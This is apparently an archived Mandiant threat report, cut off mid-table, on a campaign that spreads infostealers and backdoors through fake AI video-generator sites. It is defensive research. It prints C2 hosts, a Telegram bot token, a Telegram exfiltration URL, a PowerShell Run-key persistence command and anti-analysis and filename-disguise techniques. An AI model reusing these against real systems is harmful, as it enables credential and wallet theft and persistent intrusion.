{ "id": "2e20fbcc-dba4-40de-9461-027a191e67fe", "created_at": "2026-04-06T00:17:28.763205Z", "updated_at": "2026-04-10T03:37:08.763484Z", "deleted_at": null, "sha1_hash": "7f70590d2c14a86dbe7cc3a31817710972e8179b", "title": "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5697373, "plain_text": "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed\r\nWebsites\r\nBy Mandiant\r\nPublished: 2025-05-27 · Archived: 2026-04-05 12:38:13 UTC\r\nWritten by: Diana Ion, Rommel Joven, Yash Gupta\r\nSince November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest\r\naround AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes\r\nfake “AI video generator” websites to distribute malware leading to the deployment of payloads such as Python-based\r\ninfostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that\r\nmasquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant\r\nThreat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across\r\nvarious social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as\r\nwell, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances\r\nof success. \r\nMandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies,\r\ncredit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG)\r\nassesses UNC6032 to have a Vietnam nexus. \r\nMandiant Threat Defense acknowledges Meta's collaborative and proactive threat hunting efforts in removing the identified\r\nmalicious ads, domains, and accounts. Notably, a significant portion of Meta’s detection and removal began in 2024, prior to\r\nMandiant alerting them of additional malicious activity we identified.\r\nA similar investigation was recently published by Morphisec.\r\nCampaign Overview\r\nThreat actors haven't wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI's popularity\r\nsurged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have\r\nfueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools.\r\nThese websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure\r\n1 and Figure 2.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 1 of 28\n\nFigure 1: Malicious Facebook ads\r\nFigure 2: Malicious LinkedIn ads\r\nAs part of Meta’s implementation of the Digital Services Act, the Ad Library displays additional information (ad campaign\r\ndates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also\r\nimplemented a similar transparency tool.\r\nOur research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active\r\nsince mid 2024, all displaying similar ad content. The majority of ads which we found ran on Facebook, with only a handful\r\nalso advertised on LinkedIn. The ads were published using both attacker-created Facebook pages, as well as by\r\ncompromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious\r\nads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1\r\ndisplays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. According\r\nto Meta, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once.\r\nAd Library ID Ad Start Date Ad End Date EU Reach\r\n1589369811674269 14.12.2024 18.12.2024 300,943\r\n559230916910380 04.12.2024 09.12.2024 298,323\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 2 of 28\n\n926639029419602 07.12.2024 09.12.2024 270,669\r\n1097376935221216 11.12.2024 12.12.2024 124,103\r\n578238414853201 07.12.2024 10.12.2024 111,416\r\nTable 1: Top 5 Facebook ads by reach\r\nThe threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans.\r\nWe noted that once a domain is registered, it will be referenced in ads within a few days if not the same day. Moreover, most\r\nof the ads are short lived, with new ones being created on a daily basis. \r\nOn LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps://klingxai[.]com . This domain was\r\nregistered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of\r\n50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting\r\nincluded other regions such as Europe and Australia.\r\nAd Library ID Ad Start Date Ad End Date Total Impressions % Impressions in the US\r\n490401954 20.09.2024 20.09.2024 \u003c1k 22\r\n508076723 27.09.2024 28.09.2024 10k-50k 68\r\n511603353 30.09.2024 01.10.2024 10k-50k 61\r\n511613043 30.09.2024 01.10.2024 10k-50k 40\r\n511613633 30.09.2024 01.10.2024 10k-50k 54\r\n511622353 30.09.2024 01.10.2024 10k-50k 36\r\nTable 2: LinkedIn ads\r\nFrom the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported\r\nfunctionalities such as text-to-video or image-to-video generation. Once the user provides a prompt to generate a video,\r\nregardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure. \r\nThe payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily\r\ndesigned for information theft and capable of downloading plugins to extend their functionality. The presence of multiple,\r\nsimilar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked\r\nby security defences.\r\nIn the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to.\r\nLuma AI Investigation\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 3 of 28\n\nInfection Chain\r\nFigure 3: Infection chain lifecycle\r\nThis blog post provides a detailed analysis of our findings on the key components of this campaign:\r\nLure: The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites,\r\nresulting in malware downloads.\r\nMalware: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM\r\nand FROSTRIFT backdoors and the GRIMPULL downloader.\r\nExecution: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to\r\nexecute its payloads.\r\nPersistence: It uses AutoRun registry key for its two Backdoors (XWORM and FROSTRIFT).\r\nAnti-VM and Anti-analysis: GRIMPULL checks for commonly used artifacts\\features from known Sandbox and\r\nanalysis tools.\r\nReconnaissance \r\nHost reconnaissance: XWORM and FROSTRIFT survey the host by collecting information, including OS,\r\nusername, role, hardware identifiers, and installed AV.\r\nSoftware reconnaissance: FROSTRIFT checks the existence of certain messaging applications and browsers.\r\nCommand-and-control (C2)\r\nTor: GRIMPULL utilizes a Tor Tunnel to fetch additional .NET payloads.\r\nTelegram: XWORM sends victim notification via telegram including information gathered during host\r\nreconnaissance.\r\nTCP: The malware connects to its C2 using ports 7789, 25699, 56001.\r\nInformation stealer \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 4 of 28\n\nKeylogger: XWORM log keystrokes from the host.\r\nBrowser extensions: FROSTRIFT scans for 48 browser extensions related to Password managers,\r\nAuthenticators, and Digital wallets potentially for data theft.\r\nBackdoor Commands: XWORM supports multiple commands for further compromise.\r\nThe Lure\r\nThis particular case began from a Facebook Ad for “Luma Dream AI Machine”, masquerading as a well-known text-to-video AI tool - Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at\r\nhxxps://lumalabsai[.]in/.\r\nFigure 4: The ad the victim clicked on\r\nOnce on the fake Luma AI website, the user can click the “Start Free Now” button and choose from various video generation\r\nfunctionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5. \r\nThis multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website,\r\ncreates a sense of familiarity to the user and does not give any immediate indication of malicious intent. Once the user hits\r\nthe generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is\r\nsupposedly ready, a Download button is displayed. This leads to the download of a ZIP archive file on the victim host.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 5 of 28\n\nFigure 5: Fake AI video generation website\r\nUnsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no\r\nconnection to the user input. In this case, several archives were hosted at the path hxxps://lumalabsai[.]in/complete/ .\r\nMandiant determined that the website will serve the archive file with the most recent “Last Modified” value, indicating\r\ncontinuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally\r\nsimilar, with different obfuscation techniques applied, thus resulting in different sizes.\r\nFigure 6: Payloads hosted at hxxps://lumalabsai[.]in/complete\r\nExecution\r\nThe previously downloaded ZIP archive contains an executable with a double extension ( .mp4 and .exe ) in its name,\r\nseparated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80)  characters. This is a special\r\nwhitespace character from the Braille Pattern Block in Unicode.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 6 of 28\n\nFigure 7: Braille Pattern Blank characters in the file name\r\nThe resulting file name, Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe , aims to make the binary less\r\nsuspicious by pushing the .exe extension out of the user view. The number of Braille Pattern Blank characters used varies\r\nacross different samples served, ranging from 13 to more than 30. To further hide the true purpose of this binary, the default\r\n.mp4 Windows icon is used on the malicious file.\r\nFigure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file.\r\nFigure 8: Malicious binary vs legitimate .mp4 file\r\nSTARKVEIL\r\nThe binary Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe , tracked by Mandiant as STARKVEIL, is a\r\ndropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware\r\ncomponents. These are later utilized to inject malicious code into several legitimate processes. \r\nExecuting the malware displays an error window, as seen in Figure 9, to trick the user into trying to execute it again and into\r\nbelieving that the file is corrupted.\r\nFigure 9: Error window displayed when executing STARKVEIL\r\nFor a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the\r\nembedded files under the C:\\winsystem\\ directory.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 7 of 28\n\nFigure 10: Files in the winsystem directory\r\nDuring the second execution, the main executable spawns the Python Launcher, py.exe , with an obfuscated Python\r\ncommand as an argument. The Python command decodes an embedded Python code, which Mandiant tracks as\r\nCOILHATCH dropper. COILHATCH performs the following actions (note that the script has been deobfuscated and\r\nrenamed for improved readability):\r\nThe command takes a Base85 -encoded string, decodes it, decompresses the result using zlib , deserializes the\r\nresulting data using the marshal module, and then executes the final deserialized data as Python code.\r\nFigure 11: Python command\r\nThe decompiled first-stage Python code combines RSA , AES , RC4 , and XOR techniques to decrypt the second\r\nstage Python bytecode.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 8 of 28\n\nFigure 12: First-stage Python\r\nThe decrypted second-stage Python script executes C:\\winsystem\\heif\\heif.exe , which is a legitimate, digitally\r\nsigned executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware\r\ncomponents.\r\nFigure 13: Second-stage Python\r\nThe following is the resulting process tree:\r\nexplorer.exe\r\n ↳ 7zfm.exe \"\u003cpath\u003e\\Lumalabs_1926326251082123689-626.zip\"\r\n ↳ \"\u003cpath\u003e\\lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe\"\r\n ↳ \"C:\\winsystem\\py\\py.exe\" -c exec(__import__ ..\u003cENCODED PYTHON CODE\u003e..)\r\n ↳ \"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\winsystem\\heif\\heif.exe\"\r\n ↳ \"C:\\winsystem\\heif\\heif.exe\"\r\nMalware Analysis\r\nAs mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its\r\nsecond execution. The complete analysis of all the malware components and their roles is provided in the next sections.\r\nDirectory Benign File Side-Loaded DLL\r\nRole\r\n(Malwa\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 9 of 28\n\nC:\\winsystem\\heif heif.exe\r\nheif.dll\r\n(SHA256:\r\n839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b)\r\nLaunche\r\n%APPDATA%\\Launcher Launcher.exe\r\nlibde265.dll\r\n(SHA256:\r\n4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959)\r\nPersisten\r\n%APPDATA%\\python python.exe\r\navcodec-61.dll\r\n(SHA256:\r\n8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc)\r\nDownlo\r\n(GRIM\r\n%APPDATA%\\pythonw pythonw.exe\r\nheif.dll\r\n(SHA256:\r\na0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3)\r\nBackdoo\r\nexecuted\r\nruntime\r\n(XWOR\r\nC:\\winsystem\\heif-info heif-info.exe\r\nheif.dll\r\n(SHA256:\r\n1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb)\r\nBackdoo\r\npersisten\r\n(XWOR\r\n%APPDATA%\\ffplay ffplay.exe\r\nlibde265.dll\r\n(SHA256:\r\ndcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3)\r\nBackdoo\r\nexecuted\r\nruntime\r\n(FROST\r\nC:\\winsystem\\heif2rgb heif2rgb.exe\r\nheif.dll\r\n(SHA256:\r\ne663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822)\r\nBackdoo\r\npersisten\r\n(FROST\r\nTable 3: Malware components\r\nEach of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through\r\nprocess replacement.\r\nLauncher\r\nThe execution of C:\\winsystem\\heif\\heif.exe results in the side-loading of the malicious heif.dll , located in the same\r\ndirectory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs\r\ncode injection through process replacement.\r\nThe injected code is a .NET executable that acts as a launcher and performs the following:\r\n1. Moves multiple folders from C:\\winsystem to %APPDATA% . The destination folders are:\r\n%APPDATA%\\python\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 10 of 28\n\n%APPDATA%\\pythonw\r\n%APPDATA%\\ffplay\r\n%APPDATA%\\Launcher\r\n2. Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process\r\nare:\r\npython.exe: %APPDATA%\\python\\avcodec-61.dll\r\npythonw.exe: %APPDATA%\\pythonw\\heif.dll\r\nffplay.exe: %APPDATA%\\ffplay\\libde265.dll\r\n3. Establishes persistence via AutoRun registry key.\r\nvalue: Dropbox\r\nkey: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nroot: HKCU\\\r\nvalue data: \"cmd.exe /c \\\"cd /d \"\u003cexePath\u003e\" \u0026\u0026 \"Launcher.exe\"\"\r\nFigure 14: Main function of launcher\r\nThe AutoRun Key executes %APPDATA%\\Launcher\\Launcher.exe that sideloads the DLL file libde265.dll . This DLL\r\nspawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code’s main purpose is to execute\r\nthe legitimate binaries C:\\winsystem\\heif2rgb\\heif2rgb.exe and C:\\winsystem\\heif-info\\heif-info.exe , which, in\r\nturn, sideload the backdoors XWORM and FROSTRIFT, respectively.\r\nGRIMPULL\r\nOf the three executables, the launcher first executes %APPDATA%\\python\\python.exe , which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process. \r\nGRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server\r\nconnections.\r\nAnti-VM and Anti-Analysis \r\nGRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3 , and terminates itself if this is\r\nfound. Otherwise, the malware proceeds to perform further anti-VM checks, exiting in case any of the mentioned checks\r\nsucceeds.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 11 of 28\n\nAnti-VM and Anti-Analysis Checks\r\nModule Detection\r\nChecks for sandbox/analysis tool DLLs:\r\nSbieDll.dll (Sandboxie)\r\ncuckoomon.dll (Cuckoo Sandbox)\r\nBIOS Information Checks\r\nQueries Win32_BIOS via WMI and checks version and serial number for:\r\nVMware\r\nVIRTUAL\r\nA M I (AMI BIOS)\r\nXen\r\nParent Process Check Checks if parent process is cmd (command line)\r\nVM File Detection Checks for existence of vmGuestLib.dll in the System folder\r\nSystem Manufacturer Checks\r\nQueries Win32_ComputerSystem via WMI and checks manufacturer and\r\nmodel for:\r\nMicrosoft (Hyper-V)\r\nVMWare\r\nVirtual\r\nDisplay and System Configuration\r\nChecks\r\nChecks for specific screen resolutions:\r\n1440x900\r\n1024x768\r\n1280x1024\r\nChecks if the OS is 32-bit\r\nUsername Checks\r\nChecks for common analysis environment usernames:\r\njohn\r\nanna\r\nAny username containing xxxxxxxx\r\nTable 4: Anti-VM and Anti-analysis checks\r\nDownload Function\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 12 of 28\n\nGRIMPULL verifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress,\r\nand execute Tor from the following URL:\r\nhttps://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/\r\ntor-expert-bundle-windows-i686-13.0.9.tar.gz\r\nFigure 15: Download function\r\nAfterwards, Tor will run locally on port 9050 .\r\nC2 Communication\r\nGRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP.\r\nstrokes[.]zapto[.]org:7789\r\nThe malware maintains this connection and periodically checks for .NET payloads. Fetched payloads are decrypted using\r\nTripleDES in ECB mode with the MD5 hash of the campaign ID aff391c406ebc4c3 as the decryption key, decompressed\r\nwith GZip (using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies.\r\nMalware Configuration\r\nThe configuration elements are encoded as base64 strings, as shown in Figure 16.\r\nFigure 16: Encoded malware configuration\r\nTable 5 shows the extracted malware configuration.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 13 of 28\n\nGRIMPULL Malware Configuration\r\nC2 domain/server strokes[.]zapto[.]org\r\nPort number 7789\r\nUnique identifier/campaign ID  aff391c406ebc4c3\r\nConfiguration profile name Default\r\nTable 5: GRIMPULL configuration\r\nXWORM\r\nSecondly, the launcher executes the file %APPDATA%\\pythonw\\pythonw.exe , which side-loads the DLL heif.dll and\r\ninjects XWORM into a legitimate Windows process.\r\nXWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality\r\ninvolves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and\r\nexecuted. Supported capabilities include keylogging, command execution, screen capture, and spreading to USB drives.\r\nXWORM Configuration\r\nThe malware begins by decoding its configuration using the AES algorithm.\r\nFigure 17: Decryption of configuration\r\nTable 6 shows the extracted malware configuration.\r\nXWORM Malware Configuration\r\nHost artisanaqua[.]ddnsking[.]com\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 14 of 28\n\nPort number 25699\r\nKEY \u003c123456789\u003e\r\nSPL \u003cXwormmm\u003e\r\nVersion XWorm V5.2\r\nUSBNM USB.exe\r\nTelegram Token 8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0\r\nTelegram ChatID -1002475751919\r\nMutex ZMChdfiKw2dqF51X\r\nTable 6: XWORM configuration\r\nHost Reconnaissance\r\nThe malware then performs a system survey to gather the following information:\r\nBot ID\r\nUsername\r\nOS Name\r\nIf it’s running on USB\r\nCPU Name\r\nGPU Name\r\nRam Capacity\r\nAV Products list\r\nSample of collected information:\r\n☠ [KW-2201]\r\nNew Clinet : \u003cclient_id_from_machine_info_hash\u003e\r\nUserName : \u003cvictim_username\u003e\r\nOSFullName : \u003cvictim_OS_name\u003e\r\nUSB : \u003cis_sample_name_USB.exe\u003e\r\nCPU : \u003ccpu_description\u003e\r\nGPU : \u003cgpu_description\u003e\r\nRAM : \u003cram_size_in_GBs\u003e\r\nGroub : \u003cinstalled_av_solutions\u003e\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 15 of 28\n\nThis information is sent to a Telegram chat:\r\nhxxps[:]//api[.]telegram[.]org:443/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1\r\nowtgo24fcO0/sendMessage?chat_id=-1002475751919\u0026text=\u003ccollected_sysinfo\u003e\r\nKeylogging\r\nThe malware sample saves the logged keystrokes to the file %temp%\\Log.tmp .\r\nSample of content of Log.tmp :\r\n....### explorer ###..[Back]\r\n[Back]\r\nb\r\na\r\nn\r\nk\r\n[ENTER]\r\nC2 Communication\r\nThe sample connects to its C2 server at tcp://artisanaqua[.]ddnsking[.]com:25699 and initially sends the following\r\ninformation to the C2:\r\n\"INFO\u003cXwormmm\u003evictim_id\u003cXwormmm\u003euser\u003cXwormmm\u003e\r\nos_name\u003cXwormmm\u003eXWorm V5.2\u003cXwormmm\u003edate_in_dd/mm/yyyy\r\n\u003cXwormmm\u003eis_sample_name_USB.exe\r\n\u003cXwormmm\u003eis_administrator\u003cXwormmm\u003ehas_webcam\u003cXwormmm\u003ecpu_info\r\n\u003cXwormmm\u003egpu_info\u003cXwormmm\u003eram_size\u003cXwormmm\u003einstalled_AVs\"\r\nThen the sample waits for any of the following supported commands:\r\nCommand Description Command Description\r\npong echo back to server StartDDos Spam HTTP requests over TCP to target\r\nrec restart bot StopDDos Kill DDOS threads\r\nCLOSE shutdown bot StartReport List running processes continuously\r\nuninstall self delete StopReport Kill process monitoring threads\r\nupdate\r\nuninstall and execute\r\nreceived new version\r\nXchat Send C2 message\r\nDW\r\nExecute file on disk via\r\npowershell\r\nHosts Get hosts file contents\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 16 of 28\n\nFM Execute .NET file in memory Shosts\r\nWrite to file, likely to overwrite hosts file\r\ncontents\r\nLN\r\nDownload file from supplied\r\nURL and execute on disk\r\nDDos Unimplemented\r\nUrlopen\r\nPerform network request via\r\nbrowser\r\nngrok Unimplemented\r\nUrlhide\r\nPerform network request in\r\nprocess\r\nplugin Load a Bot plugin\r\nPCShutdown Shutdown PC now savePlugin\r\nSave plugin to registry and load it\r\nHKCU\\Software\\\u003cvictim_id\u003e\\\u003cplugin_name\u003e=\r\n\u003cplugin_bytes\u003e\r\nPCRestart Restart PC now RemovePlugins Delete all plugins in registry\r\nPCLogoff Log off OfflineGet Read Keylog\r\nRunShell Execute CMD on shell $Cap Get screen capture\r\nTable 7: Supported commands\r\nFROSTRIFT\r\nLastly, the launcher executes the file %APPDATA%\\ffplay\\ffplay.exe to side-load the DLL\r\n%APPDATA%\\ffplay\\libde265.dll and inject FROSTRIFT into a legitimate Windows process.\r\nFROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of\r\nreceiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates\r\nwith the C2 server using GZIP -compressed protobuf messages over TCP/SSL.\r\nMalware Configuration\r\nThe malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message\r\nembedded within the strings table.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 17 of 28\n\nFigure 18: FROSTRIFT configuration\r\nTable 8 shows the extracted malware configuration.\r\nField  Value\r\nProtobuf Tag 38\r\nC2 Domain strokes.zapto[.]org\r\nC2 Port 56001\r\nSSL Certificate \u003cBase64 encoded SSL certificate\u003e\r\nUnknown Default\r\nInstallation folder APPDATA\r\nMutex 7d9196467986\r\nTable 8: FROSTRIFT configration\r\nPersistence\r\nFROSTRIFT can achieve persistence by running the command:\r\npowershell.exe \"Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\\r\nMicrosoft\\Windows\\CurrentVersion\\Run' -Name '\u003csample_file_name\u003e\r\n';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\\r\nCurrentVersion\\Run' -Name '\u003csample_file_name\u003e' -Value '\"\"%APPDATA%\r\n\\\u003csample_file_name\u003e\"\"' -PropertyType 'String'\"\r\nThe sample copies itself to %APPDATA% and adds a new registry value under\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the new file path as data to ensure persistence at each system\r\nstartup.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 18 of 28\n\nHost Reconnaissance\r\nThe following information is initially collected and submitted by the malware to the C2:\r\nCollected Information\r\nHost information\r\nInstalled Anti-Virus \r\nWeb camera \r\nHostname\r\nUsername and Role\r\nOS name\r\nLocal time\r\nVictim ID\r\nHEX digest of the MD5 hash for the following combined:\r\nSample process ID\r\nDisk drive serial number\r\nPhysical memory serial number\r\nVictim user name\r\nMalware Version 4.1.8\r\nSoftware Applications\r\ncom.liberty.jaxx \r\nFoxmail \r\nTelegram\r\nBrowsers (see Table 10)\r\nStandalone Crypto\r\nWallets\r\nAtomic, Bitcoin-Qt, Dash-Qt, Electrum, Ethereum, Exodus, Litecoin-Qt, Zcash,\r\nLedger Live\r\nBrowser Extension Password managers, Authenticators, and Digital wallets (see Table 11)\r\nOthers\r\n5th entry from the Config (“Default” in this sample)\r\nMalware full file path\r\nTable 9: Collected information\r\nFROSTRIFT checks for the existence of the following browsers:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 19 of 28\n\nChromium, Chrome, Brave, Edge, QQBrowser, ChromePlus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa,\r\nElements Browser, Epic Privacy Browser, uCozMedia Uran, Sleipnir5, Citrio, Coowon, liebao, QIP Surf, Orbitum, Dragon,\r\nAmigo, Torch, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Atom\r\nTable 10: List of browsers\r\nFROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and\r\nDigital wallets. The full list is provided in Table 11.\r\nString Extension\r\nibnejdfjmmkpcnlpebklmnkoeoihofec TronLink\r\nnkbihfbeogaeaoehlefnkodbefgpgknn MetaMask\r\nfhbohimaelbohpjbbldcngcnapndodjp Binance Chain Wallet\r\nffnbelfdoeiohenkjibnmadjiehjhajb Yoroi\r\ncjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty\r\nfihkakfobkmkjojpchpfgcmhfjnmnfpi BitApp Wallet\r\nkncchdigobghenbbaddojjnnaogfppfj iWallet\r\naiifbnbfobpmeekipheeijimdpnlpgpp Terra Station\r\nijmpgkjfkbfhoebgogflfebnmejmfbml BitClip\r\nblnieiiffboillknjnepogjhkgnoapac EQUAL Wallet\r\namkmjjmmflddogmhpjloimipbofnfjih Wombat\r\njbdaocneiiinmjbjlgalhcelgbejmnid Nifty Wallet\r\nafbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet\r\nhpglfhgfnhbgpjdenjgmdgoeiappafln Guarda\r\naeachknmefphepccionboohckonoeemg Coin98 Wallet\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 20 of 28\n\nimloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager\r\noeljdldpnmdbchonielidgobddffflal EOS Authenticator\r\ngaedmjdfmmahhbjefcbgaolhhanlaolb Authy\r\nilgcnhelpchnceeipipijaljkblbcobl GAuth Authenticator\r\nbhghoamapcdpbohphigoooaddinpkbai Authenticator\r\nmnfifefkajgofkcjkemidiaecocnkjeh TezBox\r\ndkdedlpgdmmkkfjabffeganieamfklkm Cyano Wallet\r\naholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3\r\njiidiaalihmmhddjgbnbgdfflelocpak BitKeep\r\nhnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet\r\negjidjbpglichdcondbcbdnbeeppgdph Trust Wallet\r\nhmeobnfnfcmdkdcmlblgagmfpfboieaf XDEFI Wallet\r\nbfnaelmomeimhlpmgjnjophhpkkoljpa Phantom\r\nfcckkdbjnoikooededlapcalpionmalo MOBOX WALLET\r\nbocpokimicclpaiekenaeelehdjllofo XDCPay\r\nflpiciilemghbmfalicajoolhkkenfel ICONex\r\nhfljlochmlccoobkbcgpmkpjagogcgpk Solana Wallet\r\ncmndjbecilbocjfkibfbifhngkdmjgog Swash\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 21 of 28\n\ncjmkndjhnagcfbpiemnkdpomccnjblmj Finnie\r\nknogkgcdfhhbddcghachkejeap Keplr\r\nkpfopkelmapcoipemfendmdcghnegimn Liquality Wallet\r\nhgmoaheomcjnaheggkfafnjilfcefbmo Rabet\r\nfnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet\r\nklnaejjgbibmhlephnhpmaofohgkpgkd ZilPay\r\nejbalbakoplchlghecdalmeeeajnimhm MetaMask\r\nghocjofkdpicneaokfekohclmkfmepbp Exodus Web3\r\nheaomjafhiehddpnmncmhhpjaloainkn Trust Wallet\r\nhkkpjehhcnhgefhbdcgfkeegglpjchdc Braavos Smart Wallet\r\nakoiaibnepcedcplijmiamnaigbepmcb Yoroi\r\ndjclckkglechooblngghdinmeemkbgci MetaMask\r\nacdamagkdfmpkclpoglgnbddngblgibo Guarda Wallet\r\nokejhknhopdbemmfefjglkdfdhpfmflg 